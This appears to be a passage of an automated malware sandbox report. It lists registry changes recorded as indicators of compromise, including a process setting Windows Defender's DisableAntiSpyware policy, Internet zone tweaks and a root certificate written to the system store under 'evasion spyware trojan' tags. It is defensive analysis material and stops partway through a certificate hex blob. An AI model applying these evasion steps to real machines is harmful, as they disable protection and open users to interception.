Modifies data under HKEY_USERS 37 IoCs

Processes:

rundll32.exesvchost.exemsiexec.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{61005523-5D2E-496B-825D-C31C75662064}Machine\SOFTWARE	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{61005523-5D2E-496B-825D-C31C75662064}Machine\SOFTWARE\Policies\Microsoft	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{61005523-5D2E-496B-825D-C31C75662064}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@C:\Windows\System32\FirewallControlPanel.dll,-12122 = "Windows Firewall"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{61005523-5D2E-496B-825D-C31C75662064}Machine	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{61005523-5D2E-496B-825D-C31C75662064}Machine	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7"	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\GROUP POLICY OBJECTS\{61005523-5D2E-496B-825D-C31C75662064}USER	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{61005523-5D2E-496B-825D-C31C75662064}Machine\SOFTWARE\Policies\Microsoft	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{61005523-5D2E-496B-825D-C31C75662064}Machine\SOFTWARE\Policies\Microsoft\Windows Defender	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{61005523-5D2E-496B-825D-C31C75662064}Machine\SOFTWARE	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{61005523-5D2E-496B-825D-C31C75662064}User	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{61005523-5D2E-496B-825D-C31C75662064}Machine\SOFTWARE\Policies\Microsoft\Windows Defender	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{61005523-5D2E-496B-825D-C31C75662064}Machine\SOFTWARE\Policies	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects	rundll32.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{61005523-5D2E-496B-825D-C31C75662064}Machine\SOFTWARE\Policies	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exemsiexec.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\Total = "1011"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\Total = "75"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\1 = ";"	msiexec.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\InProgressFlags = "262144"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 612aa551e541d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "111"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 1d24df8b702cd701	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\""	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\ = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 00716264e741d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\ClearBrowsingHistoryOnStart = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-08760 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\LastClosedHeight = "600"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState\EdpCleanupState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\ = "90"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Clients = 3a0000000000	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "395205405"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 12 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

installer.exeOy3L2GjKns.exe19EE.exeSHyqaefepynae.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676